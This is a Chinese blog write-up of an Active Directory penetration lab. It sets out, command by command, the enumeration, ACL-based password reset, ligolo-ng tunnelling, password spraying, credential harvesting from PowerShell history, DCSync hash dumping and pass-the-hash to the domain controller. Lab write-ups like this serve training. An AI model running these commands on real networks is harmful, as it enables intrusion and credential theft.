NoCVE-Range-B

前言

靶场

https://mp.weixin.qq.com/s/OKxVIHxgJmvcBGih3T2NIQ

初始凭据

1
alice:P@ssw0rd

环境

1
2
3
192.168.10.128172.16.10.128  —— winserver2016
172.16.10.129 —— winserver20166
172.16.10.130 —— winserver2019(DC)

nmap

1
nmap -p- --min-rate 10000 192.168.10.128 -oN nmap/port.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT      STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49695/tcp open unknown
49710/tcp open unknown
49719/tcp open unknown
1
nmap -sT -sV -sC -O -p135,139,445,3389,5985 192.168.10.128 -oN nmap/detail.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
PORT     STATE SERVICE       VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-14T13:10:52+00:00; +1h00m03s from scanner time.
| ssl-cert: Subject: commonName=winserver2016.xya.com
| Not valid before: 2025-10-04T06:21:55
|_Not valid after: 2026-04-05T06:21:55
| rdp-ntlm-info:
| Target_Name: XYA
| NetBIOS_Domain_Name: XYA
| NetBIOS_Computer_Name: WINSERVER2016
| DNS_Domain_Name: xya.com
| DNS_Computer_Name: winserver2016.xya.com
| DNS_Tree_Name: xya.com
| Product_Version: 10.0.14393
|_ System_Time: 2026-02-14T13:10:46+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 00:0C:29:81:7A:AC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2016|2019
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2016 or Server 2019
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h00m02s, deviation: 0s, median: 1h00m02s
|_nbstat: NetBIOS name: WINSERVER2016, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:81:7a:ac (VMware)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-02-14T13:10:46
|_ start_date: 2026-02-14T10:01:36
  • 主机名WINSERVER2016
  • 域名xya.com
  • FQDNwinserver2016.xya.com
  • 操作系统:Windows Server 2016 或 2019

枚举

枚举用户

1
crackmapexec smb 192.168.10.128 -u 'alice' -p 'P@ssw0rd' --users
1
enum4linux -u 'alice' -p 'P@ssw0rd' 192.168.10.128
1
rpcclient -U 'alice%P@ssw0rd' 192.168.10.128

没用可用信息

枚举共享资源

1
crackmapexec smb 192.168.10.128 -u 'alice' -p 'P@ssw0rd' --shares
1
2
3
4
5
SMB         192.168.10.128  445    WINSERVER2016    Share           Permissions     Remark
SMB 192.168.10.128 445 WINSERVER2016 ----- ----------- ------
SMB 192.168.10.128 445 WINSERVER2016 ADMIN$ Remote Admin
SMB 192.168.10.128 445 WINSERVER2016 C$ Default share
SMB 192.168.10.128 445 WINSERVER2016 IPC$ Remote IPC

依然没有权限

WinRm

nmap扫描开放5985端口,尝试使用初始凭据登录

1
evil-winrm -i 192.168.10.128 -u alice -p 'P@ssw0rd'

image-20260214202001704

成功,同时发现另一张网卡172.16.10.128

1
https://github.com/nicocha30/ligolo-ng

上传SharpHound.exe收集信息

1
2
3
upload SharpHound.exe
.\SharpHound.exe -c All
download 20260214054137_BloodHound.zip

ACL利用

当前拥有的用户对wake用户有ForceChangePassword权限

image-20260214215538137

ligolo打隧道

1
2
3
4
5
6
7
8
9
10
11
kali: 
sudo ip tuntap add user kali(主机名 hostname查看) mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.10.0/24(想穿透的网段) dev ligolo

./proxy -selfcert
session
start

winserver2016:
./agent.exe --connect 192.168.10.129(kali端的ip):11601 -ignore-cert

修改密码

1
net rpc password wake -U xya.com/alice%P@ssw0rd -S 172.16.10.130

验证

1
crackmapexec smb 172.16.10.130 -u wake -d xya.com -p P@ssw0rd

成功

image-20260214215951594

得到wake凭证

1
wake:P@ssw0rd

wake winrm登录

1
evil-winrm -i 192.168.10.128 -u wake -p 'P@ssw0rd'

拿到第一个flag

1
flag{dbfa2d6c3142d7288ba5d443e8c4ba31}

枚举内网

1
crackmapexec smb 172.16.10.0/24 -u 'alice' -p 'P@ssw0rd'
1
2
3
SMB         172.16.10.129   445    WINSERVER20166   [+] xya.com\alice:P@ssw0rd 
SMB 172.16.10.128 445 WINSERVER2016 [+] xya.com\alice:P@ssw0rd
SMB 172.16.10.130 445 DC [+] xya.com\alice:P@ssw0rd

三台主机,130为DC

枚举用户

1
crackmapexec smb 172.16.10.0/24 -u 'alice' -p 'P@ssw0rd' --users 

用户

1
2
3
4
5
6
7
8
9
10
11
palo
zako
gala
sq_svc
calue
vllay
wake
alice
krbtgt
Guest
Administrator

枚举资源

1
crackmapexec smb 172.16.10.0/24 -u "alice" -p 'P@ssw0rd' --shares

image-20260214230405391

发现129主机下有个xya目录,不是默认

1
smbclient //172.16.10.129/xya -U 'xya\\alice'

从中发现Memo.txt,打开存有密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
arlpass
anonymous
root
12345678
private
123
zxsoft1234!@#$
123456
admin
system
hicomadmin
eyou_admin
cyouadmin
#NAME?
leadsec.auditor
12345
cnoa.cn2010password
leadsec@7766
admin123
leadsec
leadsec32
leadsec.useradmin
leadsec.waf
admin*PWD
firewall
Xyacontribution1!
hillstone
guest
qxcomm1680
qxcommsupport
qxcomm1688
qxcommsuport
sua_password$123
sa_password$123
password$123
venus70
venus60
sys$admin@028
freesvr
csmp@CLOUD987

密码喷洒

1
crackmapexec smb 172.16.10.0/24 -u users.txt -p memo.txt --continue-on-success

得到凭据

1
vllay:Xyacontribution1!

image-20260214231111145

登录129

1
evil-winrm -i 172.16.10.128 -u 'vllay' -p 'Xyacontribution1!'

whoami /all发现vllay是本地管理员

image-20260214231351450

拿到第二个flag

1
flag{a3ed756993a778b4f556e463caffc02c}

PowerShell历史泄露

上传winpeas并运行

1
./winpeas64.exe   >>  out.txt

发现powershell文件

1
Get-Content C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

找到一组凭据

1
calue:LongliveChina1!

Bloodhound查找该用户,发现有DCSync权限

直接secret

1
impacket-secretsdump xya.com/calue:'LongliveChina1!'@172.16.10.130
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ece39e1190e04b11c0c21797feb2ec1e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a75089d89965ea4c19f09a2134b5ecf8:::
alice:1103:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
wake:1104:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
vllay:1105:aad3b435b51404eeaad3b435b51404ee:974395078ad5bbac8423b5bb691025cc:::
calue:1106:aad3b435b51404eeaad3b435b51404ee:90b6a861ef2e0ee2987da9a32228b202:::
sq_svc:1107:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
gala:1108:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
zako:1109:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
palo:1110:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:43a785c2413b5409fcbebeedf5a1bae7:::
WINSERVER2016$:1111:aad3b435b51404eeaad3b435b51404ee:1ed0b1c5802222ed76e98d70de64dfec:::
WINSERVER20166$:1112:aad3b435b51404eeaad3b435b51404ee:b78859fd779a891e56300158adf170fe:::

登录域控

1
evil-winrm -i 172.16.10.130 -u 'administrator' -H ece39e1190e04b11c0c21797feb2ec1e

找到最后的flag

1
flag{031a7fb6e665255eed6ecbbcbf03a1cb}

路线总结

1
初始凭据->bloodhound信息收集->acl利用->隧道构建->枚举内网信息->密码喷洒->powershell操作历史->DCSync

NoCVE-Range-B
http://xiaowu5.cn/2026/02/15/NoCVE-Range-B/
作者
5
发布于
2026年2月15日
许可协议
BY XIAOWU